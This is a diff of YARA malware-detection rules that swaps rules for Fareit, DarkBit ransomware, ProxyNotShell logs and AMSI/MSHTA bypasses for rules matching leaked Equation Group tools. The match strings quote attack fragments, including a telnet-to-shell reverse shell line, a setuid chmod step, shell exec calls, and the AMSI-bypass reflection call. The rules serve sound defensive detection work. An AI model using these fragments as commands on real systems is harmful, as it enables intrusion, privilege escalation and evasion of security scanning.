-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_obfuscation.yar#L57-L75"
+		id = "81590569-e81b-5d97-8295-cc6f018fab98"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L734-L749"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8f33762e6e93fcf6b423b34eb1abefae2ae91b51048303947f7c1601823630d7"
+		logic_hash = "34298175663a01b26e317c31c720f2f4fe93a5c7e375c9642664479d8672e8cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
 
 	strings:
-		$ = "${t`rue}" ascii nocase
-		$ = "${tr`ue}" ascii nocase
-		$ = "${tru`e}" ascii nocase
-		$ = "${t`ru`e}" ascii nocase
-		$ = "${tr`u`e}" ascii nocase
-		$ = "${t`r`ue}" ascii nocase
-		$ = "${t`r`u`e}" ascii nocase
+		$x1 = "/tmp/ratload.tmp.sh" fullword ascii
+		$x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
+		$s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
 
 	condition:
-		filesize < 6000KB and 1 of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_Fareit_Trojan_Oct15 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ys : FILE
 {
 	meta:
-		description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
 		author = "Florian Roth (Nextron Systems)"
-		id = "725abb2a-7675-51b5-aed8-594e4826a6b4"
-		date = "2015-10-18"
+		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/5VYtlU"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fareit.yar#L8-L30"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L751-L766"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef47e81483d5edf67d489a9a35ce56667e293350534e780d7d93b1fbc5f7113a"
-		score = 80
+		logic_hash = "4962cc732ce3dea6dc52c7d91ce94089eb4498ba4c442ecc6363ea75de47de31"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
-		hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
-		hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
-		hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae"
-		hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f"
-		hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9"
-		hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa"
+		hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
 
 	strings:
-		$s1 = "ebai.exe" fullword wide
-		$s2 = "Origina" fullword wide
+		$x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
+		$x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
+		$x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s1 in ( 0 .. 30000 ) and $s2 in ( 0 .. 30000 )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ewok : FILE
 {
 	meta:
-		description = "Detects indicators found in DarkBit ransomware"
-		author = "Florian Roth"
-		id = "d209a0c2-f649-5fb1-9ecd-f1c35caa796f"
-		date = "2023-02-13"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
+		author = "Florian Roth (Nextron Systems)"
+		id = "379c233f-86f8-5116-a15c-8a80b27daea6"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/idonaor1/status/1624703255770005506?s=12&t=mxHaauzwR6YOj5Px8cIeIw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_darkbit_feb23.yar#L2-L23"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L768-L784"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ba1baea7cb7362160c4b00b0355000a789b238c1ec82b840479c04028e6ca3ab"
+		logic_hash = "d10d75885daa8cd20e5d7d7e142d1e7a2dbc10a50debf7892629f67b948bbdbe"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
 
 	strings:
-		$s1 = ".onion" ascii
-		$s2 = "GetMOTWHostUrl"
-		$x1 = "hus31m7c7ad.onion"
-		$x2 = "iw6v2p3cruy"
-		$xn1 = "You will receive decrypting key after the payment."
+		$x1 = "Example: ewok -t target public" fullword ascii
+		$x2 = "Usage:  cleaner host community fake_prog" fullword ascii
+		$x3 = "-g  - Subset of -m that Green Spirit hits " fullword ascii
+		$x4 = "--- ewok version" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10MB and ( 1 of ( $x* ) or 2 of them ) or 4 of them or ( filesize < 10MB and $xn1 )
+		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Xspy : FILE
 {
 	meta:
-		description = "Detects Go based DarkBit ransomware (garbled code; could trigger on other obfuscated samples, too)"
-		author = "Florian Roth"
-		id = "f530815c-68e7-55f1-8e36-bc74a1059584"
-		date = "2023-02-13"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fcb7246a-d613-51d7-a4f7-f767fa5f79e1"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.hybrid-analysis.com/sample/9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff?environmentId=160"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_darkbit_feb23.yar#L25-L45"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L786-L799"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "577435536300902811612a3415e82420574c98345b91b21fb2bfd2bfde396bec"
+		logic_hash = "94ab45d6c94c63c5c9c68ee3d509143af4eb574058c0cd4f26eed8058dbd9213"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
 
 	strings:
-		$s1 = "runtime.initLongPathSupport" ascii fullword
-		$s2 = "reflect." ascii
-		$s3 = "    \"processes\": []," ascii fullword
-		$s4 = "^!* %!(!" ascii fullword
-		$op1 = { 4d 8b b6 00 00 00 00 48 8b 94 24 40 05 00 00 31 c0 87 82 30 03 00 00 b8 01 00 00 00 f0 0f c1 82 00 03 00 00 48 8b 44 24 48 48 8b 0d ba 1f 32 00 }
-		$op2 = { 49 8d 49 01 0f 1f 00 48 39 d9 7c e2 b9 0b 00 00 00 49 89 d8 e9 28 fc ff ff e8 89 6c d7 ff }
+		$s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Equationgroup_Estesfox
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a61f6582-474f-5b6f-b8f5-329c0bcc4017"
-		date = "2022-12-22"
+		id = "f2e8b8ba-af09-5e7c-a99c-4f620a0917c9"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L2-L22"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L801-L814"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1e8f5a3440f8b4b1850fddbd19f63796ad0f28178c678e9f464b7e4ab5ca944f"
-		score = 70
+		logic_hash = "bfbc8ac62dcb61b492b1803de535f51ceb54ac83e45071270a6ef5faeaa521b2"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
 
 	strings:
-		$s1 = "/owa/mastermailbox%40outlook.com/powershell" ascii wide
-		$sa1 = " 200 " ascii wide
-		$sa2 = " POST " ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
 
 	condition:
-		all of ( $s* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_2 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Equationgroup_Elatedmonkey_1_0_1_1 : FILE
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "85722997-fd28-51cf-817e-7a314e284b0b"
-		date = "2022-12-22"
-		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L24-L45"
+		id = "d8915305-2ed7-50b7-84d0-b139a6d3481a"
+		date = "2017-04-08"
+		modified = "2022-08-18"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L816-L832"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73ce86b7a673719c916666fa06963b774edad5b2cd804994614afd83ea75ecef"
-		score = 60
-		quality = 60
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		logic_hash = "756337ecb951357c5440ea2fe010982089539c35dc556288d61db6de22348c1f"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
 
 	strings:
-		$sr1 = / \/owa\/[^\/\s]{1,30}(%40|@)[^\/\s\.]{1,30}\.[^\/\s]{2,3}\/powershell / ascii wide
-		$sa1 = " 200 " ascii wide
-		$sa2 = " POST " ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$s1 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
+		$s2 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
+		$s3 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
+		$s4 = "cat > /dev/tcp/127.0.0.1/80 <<" ascii
 
 	condition:
-		all of ( $s* ) and not 1 of ( $fp* )
+		filesize < 15KB and 2 of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_3 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Equationgroup_Scanner : FILE
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "76dd786e-daaa-5cd9-8e3e-50d9eab7f9d2"
-		date = "2022-12-22"
+		id = "b2f9c534-0ca7-5223-b85e-8e74c3cfa6ff"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L47-L66"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L834-L849"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "607d3743a46e0c5000b9c7847dd89f5d7ccf29f4f1af9bce6870d7738f071f5c"
-		score = 60
+		logic_hash = "b0454fd41d3591fc5811da6407a422b7c28d0b923109cdfa85b337cc7fffb178"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
 
 	strings:
-		$sa1 = " POST /powershell - 444 " ascii wide
-		$sa2 = " POST /Powershell - 444 " ascii wide
-		$sb1 = " - 200 0 0 2" ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$x1 = "program version netid     address             service         owner" fullword ascii
+		$x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
+		$x5 = "-scan winn %s one" fullword ascii
 
 	condition:
-		1 of ( $sa* ) and $sb1 and not 1 of ( $fp* )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Equationgroup__Ftshell_Ftshell_V3_10_3_0 : FILE
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5af3ae70-8897-593f-a413-82ca1d1ba961"
-		date = "2022-12-22"
-		modified = "2023-01-26"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L68-L86"
+		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L853-L871"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f2aac61bc17f74901ec8d638d5cfaaa45bbd2a4e40e5d915bf2a946daed411d2"
-		score = 70
+		logic_hash = "1eb7915fd057b2cc5f788ca11b3c71210ce5e7ac29c52790c249490435e62926"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
+		hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
 
 	strings:
-		$re1 = /,\/[Pp][Oo][Ww][Ee][Rr][Ss][Hh][Ee][Ll][Ll][^\n]{0,50},Kerberos,true,[^\n]{0,50},200,0,,,,[^\n]{0,2000};OnEndRequest\.End\.ContentType=application\/soap\+xml charset UTF-8;S:ServiceCommonMetadata\.HttpMethod=POST;/ ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
+		$s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
+		$s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
+		$s4 = "# ftshell -- File Transfer Shell" fullword ascii
 
 	condition:
-		$re1 and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_PS_AMSI_Bypass : FILE
+rule SIGNATURE_BASE_Equationgroup__Scanner_Scanner_V2_1_2 : FILE
 {
 	meta:
-		description = "Detects PowerShell AMSI Bypass"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "31ab8932-4c74-5251-a044-3fcc0aa159f4"
-		date = "2017-07-19"
+		id = "bf1f2119-f742-5106-96f0-de88755275ef"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L4-L17"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L873-L892"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87188c6cbb7d89c25faafb297a7c0e52321c661c84cdefd5604785c687190fcd"
-		score = 65
+		logic_hash = "3c42aaacea1347fd64d7f91421f692e77e33e273d4c2e71806ef7f5f086aba11"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
+		hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff"
 
 	strings:
-		$s1 = ".GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static')." ascii nocase
+		$s1 = "Welcome to the network scanning tool" fullword ascii
+		$s2 = "Scanning port %d" fullword ascii
+		$s3 = "/current/down/cmdout/scans" fullword ascii
+		$s4 = "Scan for SSH version" fullword ascii
+		$s5 = "program vers proto   port  service" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x457f and filesize < 100KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_JS_Suspicious_Obfuscation_Dropbox
+rule SIGNATURE_BASE_Equationgroup__Ghost_Sparc_Ghost_X86_3 : FILE
 {
 	meta:
-		description = "Detects PowerShell AMSI Bypass"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b6b288d-3a15-5267-bbb1-885febf4df78"
-		date = "2017-07-19"
+		id = "ccc9c9be-8f78-5071-a11e-47f994cf8f08"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L19-L33"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L894-L912"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "19d1dd25c4a5e18dca131709a64c3537278754ec9d67b0bb49bde9b1493d3dc7"
-		score = 70
+		logic_hash = "c4ad8e06934c1ece520863951f14cbf86d1bc4bba97aede1d58def1e5c7df4eb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1"
+		hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33"
 
 	strings:
-		$x1 = "j\"+\"a\"+\"v\"+\"a\"+\"s\"+\"c\"+\"r\"+\"i\"+\"p\"+\"t\""
-		$x2 = "script:https://www.dropbox.com" ascii
+		$x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" fullword ascii
+		$x2 = "Sending shellcode as part of an open command..." fullword ascii
+		$x3 = "cmdshellcode" fullword ascii
+		$x4 = "You will not be able to run the shellcode. Exiting..." fullword ascii
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x457f and filesize < 70KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_JS_Suspicious_MSHTA_Bypass
+rule SIGNATURE_BASE_Equationgroup__Pclean_V2_1_1_Pclean_V2_1_1_4 : FILE
 {
 	meta:
-		description = "Detects MSHTA Bypass"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2ddca78-c19a-5bb6-a1c9-4413e637ab1d"
-		date = "2017-07-19"
+		id = "ed4a3b3a-0935-533b-80dd-ee23b2e8df00"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L35-L50"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L914-L930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "df68cac0da19c5705353f26fc3f2a99556b7230f9d4f52e7a2e35cb48997b699"
-		score = 70
+		logic_hash = "5622d6fff876fa5d07795491d14f0396378c1b07b69cf8bcabb5e0bd3c19e72a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
+		hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd"
 
 	strings:
-		$s1 = "mshtml,RunHTMLApplication" ascii
-		$s2 = "new ActiveXObject(\"WScript.Shell\").Run(" ascii
-		$s3 = "/c start mshta j" ascii nocase
+		$s1 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
+		$s2 = "e.g.: -n 1-1024,1080,6666,31337 " fullword ascii
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_Javascript_Run_Suspicious
+rule SIGNATURE_BASE_Equationgroup__Jparsescan_Parsescan_5 : FILE
 {
 	meta:
-		description = "Detects a suspicious Javascript Run command"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87f98ead-3052-5777-8877-574619173aaa"
-		date = "2017-08-23"
+		id = "964a4e49-9163-5dd6-bb2c-88fa39d5f356"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/craiu/status/900314063560998912"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L52-L66"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L932-L950"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "39d2292d3749c63780dc7ca7a2414ba02e2b0e1edec7ec6a16b42aba2c44c23a"
-		score = 60
+		logic_hash = "719baa53db53f4cc4f3e9ed935814e42e5cb4b7fb8eaaa373feb73df69bfcde0"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
+		hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
 
 	strings:
-		$s1 = "w = new ActiveXObject(" ascii
-		$s2 = " w.Run(r);" fullword ascii
+		$s1 = "# default is to dump out all scanned hosts found" fullword ascii
+		$s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" fullword ascii
+		$s3 = "sadmind is available on two ports, this also works)" fullword ascii
+		$s4 = "-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scan" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x2123 and filesize < 40KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Certutil_Decode_OR_Download : FILE
+rule SIGNATURE_BASE_Equationgroup__Funnelout_V4_1_0_1 : FILE
 {
 	meta:
-		description = "Certutil Decode"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63bdefd2-225a-56d5-b615-5e236c97f050"
-		date = "2017-08-29"
-		modified = "2023-10-19"
-		reference = "Internal Research"
